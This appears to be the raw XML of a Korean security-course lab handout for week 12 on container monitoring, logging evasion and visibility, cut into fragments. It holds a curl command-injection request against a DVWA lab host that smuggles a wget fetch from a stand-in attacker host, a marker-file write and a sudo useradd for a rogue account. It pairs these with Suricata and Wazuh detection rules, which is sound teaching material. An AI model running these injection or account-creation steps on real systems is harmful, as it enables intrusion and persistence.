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W12] 컨테이너 모니터링/로깅 — 로그 회피 vs 가시성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12주차 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>컨테이너 모니터링/로깅</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. 런타임 행위 가시성·로그 수집을 점검한다. 공격자는</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>로깅을 회피하고, 점검자(너)는 런타임 모니터링(Falco류)·로그 수집을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로깅을 회피해(태그 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>cc12r1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>) 회피 흔적(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/tmp/.cc12monitor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cca12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회피 탐지, ② 런타임 모니터링 Wazuh 룰, ③ 가시성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태그/회피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`cc12r1-&lt;본인id&gt;`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, 회피 흔적 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`/tmp/.cc12monitor`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cc12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`cca12`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9012011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106121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[런타임 이상 행위] — 컨테이너 내 의심 실행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"cc12r1-kim" -H "Host: dvwa.6v6.lab" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "http://192.168.0.161/vulnerabilities/exec/?ip=127.0.0.1;wget%20http://atk/x%23cc12r1-kim&amp;Submit=Submit"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cc12r1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[로깅 회피] — 모니터링 사각 흔적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'cc12 logging evasion: stdout suppressed, log driver bypass, action unlogged' &gt; /tmp/.cc12monitor</w:t>
        <w:br/>
        <w:t>sudo useradd -m -s /bin/bash cca12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/tmp/.cc12monitor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cc12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cca12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[런타임 이상 탐지] — Suricata 룰 (sid 9012011)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(msg:"CLOUD-W12 container runtime anomaly (wget/download)"; flow:to_server; http.uri; content:"wget"; nocase; sid:9012011;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9012011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[로깅 회피 탐지] — Wazuh 룰 (id 106121)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name="edu,monitoring,"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;rule id="106121" level="12"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;if_group&gt;edu&lt;/if_group&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;match&gt;cca12&lt;/match&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;description&gt;CLOUD-W12 - container logging evasion / runtime anomaly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106121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[가시성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모니터링 점검(런타임 보안(Falco)/로그 드라이버/중앙 집계/syscall 감사/이상 탐지 베이스라인)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회피 흔적(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/tmp/.cc12monitor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>)·계정(cca12)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가시성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